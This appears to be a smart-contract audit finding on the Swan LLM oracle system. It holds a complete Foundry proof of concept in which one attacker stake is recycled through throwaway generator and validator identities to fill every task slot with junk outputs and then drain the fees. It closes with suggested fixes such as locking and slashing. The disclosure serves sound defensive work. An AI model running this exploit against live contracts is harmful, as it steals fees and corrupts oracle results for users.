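The attacker registers a mock generator, responds with an invalid output, unregisters, and hands the withdrawn stake to the next mock generator; the same procedure is then repeated with mock validators, so a single stake is enough to fill every slot of a task.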
pragma solidity ^0.8.20;
import {Test, console} from "forge-std/Test.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {ERC1967Proxy} from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol";
import {Swan} from "../contracts/swan/Swan.sol";
import {SwanMarketParameters} from "../contracts/swan/SwanManager.sol";
import {LLMOracleTaskParameters} from "../contracts/llm/LLMOracleTask.sol";
import {LLMOracleCoordinator} from "../contracts/llm/LLMOracleCoordinator.sol";
import {LLMOracleRegistry, LLMOracleKind} from "../contracts/llm/LLMOracleRegistry.sol";
import {BuyerAgentFactory, BuyerAgent} from "../contracts/swan/BuyerAgent.sol";
import {SwanAssetFactory, SwanAsset} from "../contracts/swan/SwanAsset.sol";
/// @notice Minimal ERC20 used as the `dria` token in this test; balances are set with forge-std `deal`.
/// @param tokenName   ERC20 name forwarded to the OpenZeppelin base constructor.
/// @param tokenSymbol ERC20 symbol forwarded to the OpenZeppelin base constructor.
contract MockERC20 is ERC20 {
    constructor(string memory tokenName, string memory tokenSymbol) ERC20(tokenName, tokenSymbol) {}
}
/// @notice Proof of concept: one stake is recycled through a chain of throwaway generator and
/// validator identities. Each identity registers, answers the task, unregisters and withdraws
/// its stake before the task is finalized, so the attacker fills every slot with a single stake
/// and still collects all the fees afterwards.
contract POC is Test {
    IERC20 dria;
    LLMOracleCoordinator coordinator;
    LLMOracleRegistry registry;
    address buyerAgentFactory;
    address swanAssetFactory;
    Swan swan;

    uint256 maxAssetCount = 5;
    uint256 withdrawInterval = 30 minutes;
    uint256 sellInterval = 60 minutes;
    uint256 buyInterval = 20 minutes;
    uint256 numGenerations = 5;
    uint256 numValidations = 5;
    uint256 generatorStakeAmount = 100 ether;
    uint256 validatorStakeAmount = 100 ether;
    uint8 difficulty = 10;
    uint256 generationFee = 0.02 ether;
    uint256 validationFee = 0.03 ether;

    /// @notice Deploys the fee token, then the registry, coordinator and Swan market, each behind an ERC1967 proxy.
    function setUp() public {
        buyerAgentFactory = address(new BuyerAgentFactory());
        swanAssetFactory = address(new SwanAssetFactory());
        dria = IERC20(new MockERC20("dria", "dria"));

        address impl = address(new LLMOracleRegistry());
        bytes memory data =
            abi.encodeCall(LLMOracleRegistry.initialize, (generatorStakeAmount, validatorStakeAmount, address(dria)));
        address proxy = address(new ERC1967Proxy(impl, data));
        registry = LLMOracleRegistry(proxy);

        impl = address(new LLMOracleCoordinator());
        uint256 platformFee = 1;
        data = abi.encodeCall(
            LLMOracleCoordinator.initialize,
            (address(registry), address(dria), platformFee, generationFee, validationFee)
        );
        proxy = address(new ERC1967Proxy(impl, data));
        coordinator = LLMOracleCoordinator(proxy);

        impl = address(new Swan());
        LLMOracleTaskParameters memory llmParams = LLMOracleTaskParameters({
            difficulty: difficulty,
            numGenerations: uint40(numGenerations),
            numValidations: uint40(numValidations)
        });
        SwanMarketParameters memory swanParams = SwanMarketParameters({
            withdrawInterval: withdrawInterval,
            sellInterval: sellInterval,
            buyInterval: buyInterval,
            platformFee: 1,
            maxAssetCount: maxAssetCount,
            timestamp: 0
        });
        data = abi.encodeCall(
            Swan.initialize,
            (swanParams, llmParams, address(coordinator), address(dria), buyerAgentFactory, swanAssetFactory)
        );
        proxy = address(new ERC1967Proxy(impl, data));
        swan = Swan(proxy);
    }

    /// @notice Runs the stake-recycling attack end to end and checks that the attacker profits.
    function test_PoC() public {
        address buyer = makeAddr("buyer");
        uint96 feeRoyalty = 1;
        uint256 amountPerRound = 0.1 ether;

        // 1. A buyer agent pays for and posts an oracle purchase request.
        vm.startPrank(buyer);
        BuyerAgent agent = swan.createBuyer("agent/1.0", "Testing agent", feeRoyalty, amountPerRound);
        vm.warp(block.timestamp + sellInterval + 1);
        (uint256 totalFee,,) = coordinator.getFee(agent.swan().getOracleParameters());
        deal(address(dria), address(agent), totalFee);
        bytes memory input = bytes("test input");
        agent.oraclePurchaseRequest(input, bytes("test models"));
        vm.stopPrank();

        // NOTE(review): assumes this is the coordinator's first task and task ids start at 1 — confirm.
        uint256 taskId = 1;

        // 2. The attacker owns exactly one generator stake and gives it to the first throwaway generator.
        address attacker = makeAddr("attacker");
        deal(address(dria), attacker, generatorStakeAmount);
        address firstGenerator = _mockAddr("mockGenerator", 0);
        vm.prank(attacker);
        dria.transfer(firstGenerator, generatorStakeAmount);

        // 3. Each generator registers, responds, unregisters, withdraws the stake the registry
        //    approved back to it, and hands it on. The last generator funds the first validator.
        //    NOTE(review): the first validator receives `generatorStakeAmount`, so this assumes
        //    generatorStakeAmount >= validatorStakeAmount (true for the values above).
        for (uint256 i = 0; i < numGenerations; i++) {
            address mockGenerator = _mockAddr("mockGenerator", i);
            address next =
                i + 1 == numGenerations ? _mockAddr("mockValidator", 0) : _mockAddr("mockGenerator", i + 1);

            vm.startPrank(mockGenerator);
            dria.approve(address(registry), generatorStakeAmount);
            registry.register(LLMOracleKind.Generator);
            coordinator.respond(
                taskId,
                getValidNonce(taskId, input, address(agent), mockGenerator),
                bytes("Random output"),
                bytes("Random metadata")
            );
            registry.unregister(LLMOracleKind.Generator);
            dria.transferFrom(address(registry), next, generatorStakeAmount);
            vm.stopPrank();
        }

        // 4. Same cycle for validators. Each one submits all-zero scores, and the last one
        //    returns the stake to the attacker.
        for (uint256 i = 0; i < numValidations; i++) {
            address mockValidator = _mockAddr("mockValidator", i);
            address next = i + 1 == numValidations ? attacker : _mockAddr("mockValidator", i + 1);
            // NOTE(review): assumes `validate` expects one score per generation — confirm in LLMOracleCoordinator.
            uint256[] memory scores = new uint256[](numGenerations);

            vm.startPrank(mockValidator);
            dria.approve(address(registry), validatorStakeAmount);
            registry.register(LLMOracleKind.Validator);
            coordinator.validate(
                taskId, getValidNonce(taskId, input, address(agent), mockValidator), scores, bytes("Random metadata")
            );
            registry.unregister(LLMOracleKind.Validator);
            dria.transferFrom(address(registry), next, validatorStakeAmount);
            vm.stopPrank();
        }

        // 5. Every identity has already unregistered, yet the coordinator's fee allowances can
        //    still be pulled. Generators and validators are swept in separate loops, so this also
        //    works when numGenerations != numValidations.
        for (uint256 i = 0; i < numGenerations; i++) {
            _sweepFees(_mockAddr("mockGenerator", i), attacker);
        }
        for (uint256 i = 0; i < numValidations; i++) {
            _sweepFees(_mockAddr("mockValidator", i), attacker);
        }

        uint256 finalBalance = dria.balanceOf(attacker);
        console.log("Attacker balance :", finalBalance);
        // The attacker got the recycled stake back and also earned fees on top of it.
        assertGt(finalBalance, validatorStakeAmount, "attacker should profit beyond the recycled stake");
    }

    /// @dev Deterministic, labelled address for the `index`-th throwaway identity with `prefix`.
    function _mockAddr(string memory prefix, uint256 index) private returns (address) {
        return makeAddr(string.concat(prefix, vm.toString(index)));
    }

    /// @dev Acting as `from`, moves the whole dria allowance the coordinator granted `from` to `to`.
    function _sweepFees(address from, address to) private {
        uint256 owed = dria.allowance(address(coordinator), from);
        if (owed == 0) return;
        vm.prank(from);
        dria.transferFrom(address(coordinator), to, owed);
    }

    /// @dev Brute-forces the smallest nonce >= 1 for which the hash of
    /// abi.encodePacked(taskId, input, requester, sender, nonce) is <= type(uint256).max >> difficulty.
    /// NOTE(review): assumes this matches the coordinator's proof-of-work check — confirm.
    function getValidNonce(uint256 taskId, bytes memory input, address requester, address sender)
        private
        view
        returns (uint256 nonce)
    {
        bytes memory message;
        do {
            nonce++;
            message = abi.encodePacked(taskId, input, requester, sender, nonce);
        } while (uint256(keccak256(message)) > type(uint256).max >> uint256(difficulty));
    }
}
Introduce a locking mechanism that prevents generators and validators from unregistering while any task they have responded to or validated has not yet been finalized. Additionally, registration in `LLMOracleRegistry` could be restricted to a whitelist of approved generators and validators. Finally, as a long-term solution, introduce a slashing mechanism that penalizes misbehaving generators and validators.